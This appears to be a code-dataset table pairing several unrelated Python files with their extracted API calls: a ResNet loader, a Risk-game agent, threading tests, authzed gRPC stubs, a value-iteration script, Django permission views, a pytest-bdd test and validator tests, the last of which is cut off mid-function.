code | apis | extract_api |
---|---|---|
import torch
import torch.nn as nn
def load_pytorch_model(resnet_name, pretrained):
    return torch.hub.load('pytorch/vision:v0.6.0', resnet_name, pretrained=pretrained)


def freeze_layers(resnet_model):
    for param in resnet_model.parameters():
        param.requires_grad = False
    return resnet_model


def get_resnet(version, class_number, pretrained, freeze_conv=False):
    """
    Select a ResNet network version
    :param version: 'resnet18','resnet34', 'resnet50', 'resnet101', 'resnet152',
                    'wide_resnet50_2', 'wide_resnet101_2',
                    'resnext50_32x4d', 'resnext101_32x8d',
    :param class_number: python int
    :param pretrained: bool
    :param freeze_conv: bool
    :return: torch model
    """
    model = load_pytorch_model(version, pretrained)
    print(f'Loaded: {version}')
    if freeze_conv:
        model = freeze_layers(model)
    num_features = model.fc.in_features
    model.fc = nn.Linear(num_features, class_number)
    return model
| [
"torch.hub.load",
"torch.nn.Linear"
] | [((99, 174), 'torch.hub.load', 'torch.hub.load', (['"""pytorch/vision:v0.6.0"""', 'resnet_name'], {'pretrained': 'pretrained'}), "('pytorch/vision:v0.6.0', resnet_name, pretrained=pretrained)\n", (113, 174), False, 'import torch\n'), ((965, 1002), 'torch.nn.Linear', 'nn.Linear', (['num_features', 'class_number'], {}), '(num_features, class_number)\n', (974, 1002), True, 'import torch.nn as nn\n')] |
from riskGame.classes.agent.agent import Agent
from riskGame.classes.state.move import Move
class Human(Agent):
    def __init__(self):
        super(Human, self).__init__(None, None, None)

    def play_human(self, state, bonus_hold_node_number=None, move_from_node_number=None, move_to_node_number=None, \
                   moved_armies=None, attacker_node_number=None, attacked_node_number=None, attacked_node_armies=None):
        move = Move()
        if bonus_hold_node_number:
            node = state.get_current_player().get_node_by_name(bonus_hold_node_number)
            move.set_bonus_hold_node(node)
        if move_from_node_number and move_to_node_number and moved_armies > 0:
            from_node = state.get_current_player().get_node_by_name(move_from_node_number)
            to_node = state.get_current_player().get_node_by_name(move_to_node_number)
            move.set_move_from_node(from_node)
            move.set_move_to_node(to_node)
            move.set_moved_armies(moved_armies)
        if attacker_node_number and attacked_node_number and attacked_node_armies > 0:
            attacker_node = state.get_current_player().get_node_by_name(attacker_node_number)
            if attacker_node:
                attacked_node = attacker_node.get_possible_attacked_node_by_name(attacked_node_number)
            else:
                attacked_node = None
            move.set_attacker_node(attacker_node)
            move.set_attacked_node(attacked_node)
            move.set_attacked_node_armies(attacked_node_armies)
        return self.play(state, move)
| [
"riskGame.classes.state.move.Move"
] | [((447, 453), 'riskGame.classes.state.move.Move', 'Move', ([], {}), '()\n', (451, 453), False, 'from riskGame.classes.state.move import Move\n')] |
from threading import Thread
from wraptor.context import maybe
def test_basic():
    with maybe(lambda: False) as result:
        assert result == False

    check = False
    with maybe(lambda: True):
        check = True
    assert check


def test_threads():
    def worker(arr, index):
        for i in range(5):
            with maybe(lambda: i == 3):
                arr[index] = True

    workers = 100
    arr = [False for i in range(workers)]
    threads = [Thread(target=worker, args=(arr, i)) for i in range(workers)]
    [t.start() for t in threads]
    [t.join() for t in threads]
    assert all(arr)
| [
"wraptor.context.maybe",
"threading.Thread"
] | [((92, 113), 'wraptor.context.maybe', 'maybe', (['(lambda : False)'], {}), '(lambda : False)\n', (97, 113), False, 'from wraptor.context import maybe\n'), ((183, 203), 'wraptor.context.maybe', 'maybe', (['(lambda : True)'], {}), '(lambda : True)\n', (188, 203), False, 'from wraptor.context import maybe\n'), ((468, 504), 'threading.Thread', 'Thread', ([], {'target': 'worker', 'args': '(arr, i)'}), '(target=worker, args=(arr, i))\n', (474, 504), False, 'from threading import Thread\n'), ((335, 357), 'wraptor.context.maybe', 'maybe', (['(lambda : i == 3)'], {}), '(lambda : i == 3)\n', (340, 357), False, 'from wraptor.context import maybe\n')] |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from authzed.api.v1alpha1 import schema_pb2 as authzed_dot_api_dot_v1alpha1_dot_schema__pb2
class SchemaServiceStub(object):
    """SchemaService implements operations on a Permissions System's Schema.
    """

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        self.ReadSchema = channel.unary_unary(
            '/authzed.api.v1alpha1.SchemaService/ReadSchema',
            request_serializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.SerializeToString,
            response_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.FromString,
        )
        self.WriteSchema = channel.unary_unary(
            '/authzed.api.v1alpha1.SchemaService/WriteSchema',
            request_serializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.SerializeToString,
            response_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.FromString,
        )


class SchemaServiceServicer(object):
    """SchemaService implements operations on a Permissions System's Schema.
    """

    def ReadSchema(self, request, context):
        """Read returns the current Object Definitions for a Permissions System.

        Errors include:
        - INVALID_ARGUMENT: a provided value has failed to semantically validate
        - NOT_FOUND: one of the Object Definitions being requested does not exist
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def WriteSchema(self, request, context):
        """Write overwrites the current Object Definitions for a Permissions System.

        Any Object Definitions that exist, but are not included will be deleted.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')


def add_SchemaServiceServicer_to_server(servicer, server):
    rpc_method_handlers = {
        'ReadSchema': grpc.unary_unary_rpc_method_handler(
            servicer.ReadSchema,
            request_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.FromString,
            response_serializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.SerializeToString,
        ),
        'WriteSchema': grpc.unary_unary_rpc_method_handler(
            servicer.WriteSchema,
            request_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.FromString,
            response_serializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.SerializeToString,
        ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
        'authzed.api.v1alpha1.SchemaService', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))


# This class is part of an EXPERIMENTAL API.
class SchemaService(object):
    """SchemaService implements operations on a Permissions System's Schema.
    """

    @staticmethod
    def ReadSchema(request,
                   target,
                   options=(),
                   channel_credentials=None,
                   call_credentials=None,
                   insecure=False,
                   compression=None,
                   wait_for_ready=None,
                   timeout=None,
                   metadata=None):
        return grpc.experimental.unary_unary(request, target, '/authzed.api.v1alpha1.SchemaService/ReadSchema',
            authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.SerializeToString,
            authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def WriteSchema(request,
                    target,
                    options=(),
                    channel_credentials=None,
                    call_credentials=None,
                    insecure=False,
                    compression=None,
                    wait_for_ready=None,
                    timeout=None,
                    metadata=None):
        return grpc.experimental.unary_unary(request, target, '/authzed.api.v1alpha1.SchemaService/WriteSchema',
            authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.SerializeToString,
            authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| [
"grpc.method_handlers_generic_handler",
"grpc.experimental.unary_unary",
"grpc.unary_unary_rpc_method_handler"
] | [((3077, 3176), 'grpc.method_handlers_generic_handler', 'grpc.method_handlers_generic_handler', (['"""authzed.api.v1alpha1.SchemaService"""', 'rpc_method_handlers'], {}), "('authzed.api.v1alpha1.SchemaService',\n rpc_method_handlers)\n", (3113, 3176), False, 'import grpc\n'), ((2355, 2629), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.ReadSchema'], {'request_deserializer': 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.FromString', 'response_serializer': 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.SerializeToString'}), '(servicer.ReadSchema,\n request_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.\n ReadSchemaRequest.FromString, response_serializer=\n authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.\n SerializeToString)\n', (2390, 2629), False, 'import grpc\n'), ((2714, 2991), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.WriteSchema'], {'request_deserializer': 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.FromString', 'response_serializer': 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.SerializeToString'}), '(servicer.WriteSchema,\n request_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.\n WriteSchemaRequest.FromString, response_serializer=\n authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.\n SerializeToString)\n', (2749, 2991), False, 'import grpc\n'), ((3728, 4110), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/authzed.api.v1alpha1.SchemaService/ReadSchema"""', 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.SerializeToString', 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/authzed.api.v1alpha1.SchemaService/ReadSchema',\n authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.\n SerializeToString, authzed_dot_api_dot_v1alpha1_dot_schema__pb2.\n ReadSchemaResponse.FromString, options, channel_credentials, insecure,\n call_credentials, compression, wait_for_ready, timeout, metadata)\n", (3757, 4110), False, 'import grpc\n'), ((4462, 4847), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/authzed.api.v1alpha1.SchemaService/WriteSchema"""', 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.SerializeToString', 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/authzed.api.v1alpha1.SchemaService/WriteSchema',\n authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.\n SerializeToString, authzed_dot_api_dot_v1alpha1_dot_schema__pb2.\n WriteSchemaResponse.FromString, options, channel_credentials, insecure,\n call_credentials, compression, wait_for_ready, timeout, metadata)\n", (4491, 4847), False, 'import grpc\n')] |
import numpy as np
theta = 0.00000000000000000000001  # a non-zero positive number
ph = 0.55  # need to change to fit in new settings
value_table = np.zeros(101)
action_table = np.zeros(101)
def agent_run():
    global theta, ph, value_table
    value = 0
    delta = 0
    sweep = 0
    i = 30
    while delta >= 0:
        sweep += 1
        delta = 0
        for state in range(1, 100):
            value = value_table[state]
            for action in range(1, min(state, 100 - state) + 1):
                if action + state >= 100:
                    temp_value = ph*(1 + value_table[state+action]) + (1 - ph)* (0 + value_table[state-action])
                else:
                    temp_value = ph * (0 + value_table[state + action]) + (1 - ph) * (0 + value_table[state - action])
                if temp_value > value:
                    value = temp_value #find max for all action
                    optimal_action = action
            delta = max(delta, abs(value - value_table[state]))
            if value > value_table[state]:
                value_table[state] = value
                action_table[state] = optimal_action
        #print(delta) #debug
        if delta < theta:
            #print(sweep) #debug
            return value_table


output = agent_run()
for i in range(0, 100):
    print(action_table[i])
for i in range(0, 100):
    print(value_table[i])
#print(action_table) | [
"numpy.zeros"
] | [((147, 160), 'numpy.zeros', 'np.zeros', (['(101)'], {}), '(101)\n', (155, 160), True, 'import numpy as np\n'), ((177, 190), 'numpy.zeros', 'np.zeros', (['(101)'], {}), '(101)\n', (185, 190), True, 'import numpy as np\n')] |
#encoding=utf8
from django.http import HttpResponse,HttpResponseRedirect
from django.shortcuts import render
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.contrib.auth.models import User,Group
from django.core import urlresolvers
from app.permission.models import PagePermission, UserPerms,GroupPerms
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth.decorators import login_required
def _get_named_patterns():
    "Returns list of (pattern-name, pattern) tuples"
    resolver = urlresolvers.get_resolver(None)
    patterns = [
        (key, value[0][0][0], value[1])
        for key, value in resolver.reverse_dict.items()
        if isinstance(key, basestring)
    ]
    return patterns


@login_required
def initialize(request):
    patterns = _get_named_patterns()
    r = HttpResponse("initialized", content_type = 'text/plain')
    for i1,i2,i3 in patterns:
        #Perm.objects.create(name = i1,code = i3,url_regex = i3,action = i1)
        try:
            PagePermission.objects.get(code=i3)
        except ObjectDoesNotExist:
            p= PagePermission()
            p.name = i1
            p.code = i3
            p.url_regex = i3
            p.action = i1
            p.save()
    return r


@login_required
def user_change(request):
    if request.method == 'GET':
        userid = request.GET.get('uid')
        #get user information
        user = User.objects.get(id=userid)
        #user permission list for template
        perm_qs = PagePermission.objects.all()
        perms = [
            dict(id=perm.id, name=perm.name, selected=False)
            for perm in perm_qs]
        #user permission list for template
        #group_qs = Group.objects.all()
        # groups = [
        #     dict(id=group.id, name=group.name, selected=False)
        #     for group in group_qs
        # ]
        #add selected if user has permission
        user_perms_qs = UserPerms.objects.filter(user=user)
        user_perms_ids = [user_perm.perm_id for user_perm in user_perms_qs]
        for i in perms:
            if i['id'] in user_perms_ids:
                i['has_perm'] = True
        #add selected if user in these groups
        # user_group_qs = user.groups.all()
        # user_group_ids = [user_group.id for user_group in user_group_qs]
        #
        # for j in groups:
        #     if j['id'] in user_group_ids:
        #         j['selected'] = True
        #render the template
        return render(request, 'user/change_user.html',
                      {"perms": perms, 'user':user})
    elif request.method == 'POST':
        userid = request.POST.get('uid')
        perm_ids = request.POST.getlist('permission_list[]')
        group_ids = request.POST.getlist('group_list[]')
        user = User.objects.get(id=userid)
        # delete the previous permissions
        UserPerms.objects.filter(
            user_id=userid,).delete()
        # add the new permissions
        perm_ids = [long(permid) for permid in perm_ids]
        for perm_id in perm_ids:
            up = UserPerms()
            up.perm_id = perm_id
            up.user_id = userid
            up.save()
        # remove the user's old groups
        old_groups = user.groups.all()
        for og in old_groups:
            user.groups.remove(og)
        user.save()
        # add the new groups
        groups = Group.objects.filter(id__in=group_ids)
        for g in groups:
            user.groups.add(g)
        user.save()
        return HttpResponseRedirect('/perm/user/edit?uid=%s' % userid)


@login_required
def group_change(request):
    if request.method == 'GET':
        gid = request.GET.get('gid')
        #get group information
        group = Group.objects.get(id=gid)
        #group permission list for template
        perm_qs = PagePermission.objects.all()
        perms = [
            dict(id=perm.id, name=perm.name, selected=False)
            for perm in perm_qs]
        group_perms_qs = GroupPerms.objects.filter(group=group)
        group_perms_ids = [group_perm.perm_id for group_perm in group_perms_qs]
        for i in perms:
            if i['id'] in group_perms_ids:
                i['has_perm'] = True
        #add selected if user in these groups
        #render the template
        return render(request, 'user/group_change.html',
                      {"perms": perms, 'group': group})
    elif request.method == 'POST':
        gid = request.POST.get('gid')
        perm_ids = request.POST.getlist('permission_list[]')
        group = Group.objects.get(id=gid)
        # delete the previous permissions
        GroupPerms.objects.filter(
            group_id=gid,).delete()
        # add the new permissions
        perm_ids = [long(permid) for permid in perm_ids]
        for perm_id in perm_ids:
            gp = GroupPerms()
            gp.perm_id = perm_id
            gp.group_id = gid
            gp.save()
        return HttpResponseRedirect('/perm/group/edit?gid=%s' % gid)


@login_required
def user_list(request):
    key = request.GET.get('kw')
    if key:
        qs = User.objects.filter(username__contains=key)
    else:
        qs = User.objects.all()
    page = request.GET.get('page')
    paginator = Paginator(qs, 20)
    try:
        show_users = paginator.page(page)
    except PageNotAnInteger:
        # If page is not an integer, deliver first page.
        show_users = paginator.page(1)
    except EmptyPage:
        # If page is out of range (e.g. 9999), deliver last page of results.
        show_users = paginator.page(paginator.num_pages)
    param = "pz=20&search_kw="+key if key else "pz=20"
    return render(request, 'user_list.html', {'lines': show_users,"otherparam": param})
#
# def initialize(request):
# patterns = _get_named_patterns()
# r = HttpResponse("initialized", content_type = 'text/plain')
# for i1,i2,i3 in patterns:
# #Perm.objects.create(name = i1,code = i3,url_regex = i3,action = i1)
# try:
# Perm.objects.get(code=i3)
#
# except ObjectDoesNotExist:
# p= Perm()
# p.name = i1
# p.code = i3
# p.url_regex = i3
# p.action = i1
# p.save()
# return r
#
#
#
# def _get_named_patterns():
# "Returns list of (pattern-name, pattern) tuples"
# resolver = urlresolvers.get_resolver(None)
#
# for url_ptn in resolver.url_patterns:
# print url_ptn
#
# for key, value in resolver.reverse_dict.items() :
# if isinstance(key, basestring):
# print key,value
# patterns = [
# (key, value[0][0][0],value[1])
# for key, value in resolver.reverse_dict.items()
# if isinstance(key, basestring)
# ]
# return patterns
#
#
#
# def edit(request):
#
#
# if request.method == "GET":
# perms = Perm.objects.all()
# uids = request.GET.get("uids","")
# gids = request.GET.get("gids","")
# if uids:
# member = User.objects.get(id = uids)
# _user_perms = UserPerms.objects.filter(user = member)
# given_perm_ids = [up.perm_id for up in _user_perms]
# elif gids:
# member = Group.objects.get(id = gids)
# _usergroup_perms = UserGroupPerms.objects.filter(group = member.id)
# given_perm_ids = [up.perm_id for up in _usergroup_perms]
#
# return render_to_response("admin/edit_perms.html",locals())
# else:
# uids = request.POST.get("uids")
# gids = request.POST.get("gids")
#
# chosen_perms = map(int,request.POST.getlist("chosen_perms"))
#
# if uids:
# former_perms = UserPerms.objects.filter(user__id = uids)
# former_perm_ids = [up.perm_id for up in former_perms]
# to_delete_perms = set(former_perm_ids) - set(chosen_perms)
# to_add_perms = set(chosen_perms) - set(former_perm_ids)
#
# UserPerms.change_perm(uids,to_delete_perms,to_add_perms)
#
# if gids:
# former_perms = UserGroupPerms.objects.filter(group__id = gids)
# former_perm_ids = [ugp.perm_id for ugp in former_perms]
# to_delete_perms = set(former_perm_ids) - set(chosen_perms)
# to_add_perms = set(chosen_perms) - set(former_perm_ids)
#
# UserGroupPerms.change_perm(gids,to_delete_perms,to_add_perms)
#
# return HttpResponse("EDIT PERMS") | [
"django.shortcuts.render",
"django.http.HttpResponseRedirect",
"app.permission.models.UserPerms.objects.filter",
"app.permission.models.GroupPerms",
"django.contrib.auth.models.Group.objects.get",
"django.contrib.auth.models.Group.objects.filter",
"app.permission.models.UserPerms",
"django.http.HttpResponse",
"django.contrib.auth.models.User.objects.all",
"app.permission.models.PagePermission",
"django.core.urlresolvers.get_resolver",
"django.contrib.auth.models.User.objects.filter",
"app.permission.models.GroupPerms.objects.filter",
"app.permission.models.PagePermission.objects.all",
"app.permission.models.PagePermission.objects.get",
"django.contrib.auth.models.User.objects.get",
"django.core.paginator.Paginator"
] | [((551, 582), 'django.core.urlresolvers.get_resolver', 'urlresolvers.get_resolver', (['None'], {}), '(None)\n', (576, 582), False, 'from django.core import urlresolvers\n'), ((850, 904), 'django.http.HttpResponse', 'HttpResponse', (['"""initialized"""'], {'content_type': '"""text/plain"""'}), "('initialized', content_type='text/plain')\n", (862, 904), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((5144, 5161), 'django.core.paginator.Paginator', 'Paginator', (['qs', '(20)'], {}), '(qs, 20)\n', (5153, 5161), False, 'from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\n'), ((5562, 5639), 'django.shortcuts.render', 'render', (['request', '"""user_list.html"""', "{'lines': show_users, 'otherparam': param}"], {}), "(request, 'user_list.html', {'lines': show_users, 'otherparam': param})\n", (5568, 5639), False, 'from django.shortcuts import render\n'), ((1442, 1469), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'id': 'userid'}), '(id=userid)\n', (1458, 1469), False, 'from django.contrib.auth.models import User, Group\n'), ((1530, 1558), 'app.permission.models.PagePermission.objects.all', 'PagePermission.objects.all', ([], {}), '()\n', (1556, 1558), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((1958, 1993), 'app.permission.models.UserPerms.objects.filter', 'UserPerms.objects.filter', ([], {'user': 'user'}), '(user=user)\n', (1982, 1993), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((2504, 2576), 'django.shortcuts.render', 'render', (['request', '"""user/change_user.html"""', "{'perms': perms, 'user': user}"], {}), "(request, 'user/change_user.html', {'perms': perms, 'user': user})\n", (2510, 2576), False, 'from django.shortcuts import render\n'), ((3678, 3703), 'django.contrib.auth.models.Group.objects.get', 'Group.objects.get', ([], {'id': 'gid'}), '(id=gid)\n', (3695, 3703), False, 'from django.contrib.auth.models import User, Group\n'), ((3764, 3792), 'app.permission.models.PagePermission.objects.all', 'PagePermission.objects.all', ([], {}), '()\n', (3790, 3792), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((3932, 3970), 'app.permission.models.GroupPerms.objects.filter', 'GroupPerms.objects.filter', ([], {'group': 'group'}), '(group=group)\n', (3957, 3970), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((4248, 4323), 'django.shortcuts.render', 'render', (['request', '"""user/group_change.html"""', "{'perms': perms, 'group': group}"], {}), "(request, 'user/group_change.html', {'perms': perms, 'group': group})\n", (4254, 4323), False, 'from django.shortcuts import render\n'), ((5007, 5050), 'django.contrib.auth.models.User.objects.filter', 'User.objects.filter', ([], {'username__contains': 'key'}), '(username__contains=key)\n', (5026, 5050), False, 'from django.contrib.auth.models import User, Group\n'), ((5074, 5092), 'django.contrib.auth.models.User.objects.all', 'User.objects.all', ([], {}), '()\n', (5090, 5092), False, 'from django.contrib.auth.models import User, Group\n'), ((1039, 1074), 'app.permission.models.PagePermission.objects.get', 'PagePermission.objects.get', ([], {'code': 'i3'}), '(code=i3)\n', (1065, 1074), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((2810, 2837), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'id': 'userid'}), '(id=userid)\n', (2826, 2837), False, 'from 
django.contrib.auth.models import User, Group\n'), ((3326, 3364), 'django.contrib.auth.models.Group.objects.filter', 'Group.objects.filter', ([], {'id__in': 'group_ids'}), '(id__in=group_ids)\n', (3346, 3364), False, 'from django.contrib.auth.models import User, Group\n'), ((3461, 3516), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', (["('/perm/user/edit?uid=%s' % userid)"], {}), "('/perm/user/edit?uid=%s' % userid)\n", (3481, 3516), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((4499, 4524), 'django.contrib.auth.models.Group.objects.get', 'Group.objects.get', ([], {'id': 'gid'}), '(id=gid)\n', (4516, 4524), False, 'from django.contrib.auth.models import User, Group\n'), ((4852, 4905), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', (["('/perm/group/edit?gid=%s' % gid)"], {}), "('/perm/group/edit?gid=%s' % gid)\n", (4872, 4905), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((1126, 1142), 'app.permission.models.PagePermission', 'PagePermission', ([], {}), '()\n', (1140, 1142), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((3051, 3062), 'app.permission.models.UserPerms', 'UserPerms', ([], {}), '()\n', (3060, 3062), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((4737, 4749), 'app.permission.models.GroupPerms', 'GroupPerms', ([], {}), '()\n', (4747, 4749), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((2864, 2904), 'app.permission.models.UserPerms.objects.filter', 'UserPerms.objects.filter', ([], {'user_id': 'userid'}), '(user_id=userid)\n', (2888, 2904), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((4551, 4590), 'app.permission.models.GroupPerms.objects.filter', 'GroupPerms.objects.filter', ([], {'group_id': 'gid'}), '(group_id=gid)\n', (4576, 4590), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n')] |
import textwrap
import pytest
def test_multi_examples(testdir):
    testdir.makefile(
        ".feature",
        steps=textwrap.dedent(
            """\
            Feature: test pytest-bdd step extension
                pytest-bdd step extension test, step params alias and constant step params e.g.

                Examples:
                | v1 |
                | k11 |
                | k12 |

                Examples:
                | v2 |
                | k21 |
                | k22 |

                Scenario Outline: test multi examples
                    Then show result: <v1> <v2> <v3> <v4>
                    Examples:
                    | v3 |
                    | k31 |
                    | k32 |
                    Examples:
                    | v4 |
                    | k41 |
                    | k42 |
                    Examples:
                    | v2 |
                    | k23 |
                    | k24 |
            """
        ),
    )
    testdir.makepyfile(
        textwrap.dedent(
            """\
            from pytest_bdd import given, then, scenario

            @then("show result: <v1> <v2> <v3> <v4>")
            def step_then_show_result(v1, v2, v3, v4):
                print ("show result: {0}_{1}_{2}_{3}".format(v1, v2, v3, v4))

            @scenario('steps.feature', 'test multi examples')
            def test_multi_examples():
                pass
            """
        )
    )
    result = testdir.runpytest("-v", "-s")
    result.assert_outcomes(passed=16, failed=0)
| [
"textwrap.dedent"
] | [((970, 1385), 'textwrap.dedent', 'textwrap.dedent', (['""" from pytest_bdd import given, then, scenario\n\n\n @then("show result: <v1> <v2> <v3> <v4>")\n def step_then_show_result(v1, v2, v3, v4):\n print ("show result: {0}_{1}_{2}_{3}".format(v1, v2, v3, v4))\n\n\n @scenario(\'steps.feature\', \'test multi examples\')\n def test_multi_examples():\n pass\n """'], {}), '(\n """ from pytest_bdd import given, then, scenario\n\n\n @then("show result: <v1> <v2> <v3> <v4>")\n def step_then_show_result(v1, v2, v3, v4):\n print ("show result: {0}_{1}_{2}_{3}".format(v1, v2, v3, v4))\n\n\n @scenario(\'steps.feature\', \'test multi examples\')\n def test_multi_examples():\n pass\n """\n )\n', (985, 1385), False, 'import textwrap\n'), ((122, 916), 'textwrap.dedent', 'textwrap.dedent', (['""" Feature: test pytest-bdd step extension\n pytest-bdd step extension test, step params alias and constant step params e.g.\n\n Examples:\n | v1 |\n | k11 |\n | k12 |\n\n Examples:\n | v2 |\n | k21 |\n | k22 |\n\n\n Scenario Outline: test multi examples\n Then show result: <v1> <v2> <v3> <v4>\n Examples:\n | v3 |\n | k31 |\n | k32 |\n Examples:\n | v4 |\n | k41 |\n | k42 |\n Examples:\n | v2 |\n | k23 |\n | k24 | \n """'], {}), '(\n """ Feature: test pytest-bdd step extension\n pytest-bdd step extension test, step params alias and constant step params e.g.\n\n Examples:\n | v1 |\n | k11 |\n | k12 |\n\n Examples:\n | v2 |\n | k21 |\n | k22 |\n\n\n Scenario Outline: test multi examples\n Then show result: <v1> <v2> <v3> <v4>\n Examples:\n | v3 |\n | k31 |\n | k32 |\n Examples:\n | v4 |\n | k41 |\n | k42 |\n Examples:\n | v2 |\n | k23 |\n | k24 | \n """\n )\n', (137, 916), False, 'import textwrap\n')] |
from spotlight.tests.validator_test import ValidatorTest
from spotlight import errors as err
class CustomMessageTest(ValidatorTest):
    def setUp(self):
        self.validator.messages = {}
        self.validator.fields = {}
        self.validator.values = {}

    def test_custom_field_message_expect_new_message(self):
        new_message = "You've supplied an invalid e-mail address."
        rules = {
            "email": "email"
        }
        input_values = {
            "email": "this.is.not.a.valid.email"
        }
        messages = {
            "email": new_message
        }
        self.validator.messages = messages
        errors = self.validator.validate(input_values, rules)
        errs = errors.get("email")
        self.assertEqual(errs[0], new_message)

    def test_custom_subfield_message_expect_new_message(self):
        new_message = "Hey! This is a required field!"
        rules = {
            "email": "required"
        }
        input_values = {}
        messages = {
            "email.required": new_message
        }
        self.validator.messages = messages
        errors = self.validator.validate(input_values, rules)
        errs = errors.get("email")
        self.assertEqual(errs[0], new_message)

    def test_custom_subfield_message_with_field_expect_new_message(self):
        new_message = "Hey! The {field} field is a required field!"
        rules = {
            "email": "required"
        }
        input_values = {}
        messages = {
            "email.required": new_message
        }
        self.validator.messages = messages
        errors = self.validator.validate(input_values, rules)
        errs = errors.get("email")
        self.assertEqual(errs[0], new_message.format(field="email"))

    def test_custom_subfield_message_with_min_expect_new_message(self):
        new_message = "Hey! The {field} field has to be at least {min} chars!"
        rules = {
            "email": "min:5"
        }
        input_values = {
            "email": "oops"
        }
        messages = {
            "email.min": new_message
        }
        self.validator.messages = messages
        errors = self.validator.validate(input_values, rules)
        errs = errors.get("email")
        self.assertEqual(errs[0], new_message.format(field="email", min=5))

    def test_custom_field_expect_new_field(self):
        rules = {
            "test": "min:5"
        }
        input_values = {
            "test": "oops"
        }
        fields = {
            "test": "custom"
        }
        self.validator.fields = fields
        expected = err.MIN_STRING_ERROR.format(field="custom", min=5)
        errors = self.validator.validate(input_values, rules)
        errs = errors.get("test")
        self.assertEqual(errs[0], expected)

    def test_custom_field_and_custom_other_field_expect_new_fields(self):
        new_message = "The {field} field has to be present with {other}."
        rules = {
            "test1": "required",
            "test2": "required_with:test1"
        }
        input_values = {
            "test1": "hello"
        }
        messages = {
            "test2.required_with": new_message
        }
        fields = {
            "test1": "custom",
            "test2": "lol"
        }
        self.validator.messages = messages
        self.validator.fields = fields
        expected = new_message.format(field="lol", other="custom")
        errors = self.validator.validate(input_values, rules)
        errs = errors.get("test2")
        self.assertEqual(errs[0], expected)

    def test_custom_field_message_with_custom_field_expect_new_message(self):
        new_message = "You've supplied an invalid {field}."
        rules = {
            "email2": "email"
        }
        input_values = {
            "email2": "this.is.not.a.valid.email"
        }
        messages = {
            "email2": new_message
        }
        fields = {
            "email2": "e-mail address"
        }
        self.validator.messages = messages
        self.validator.fields = fields
        errors = self.validator.validate(input_values, rules)
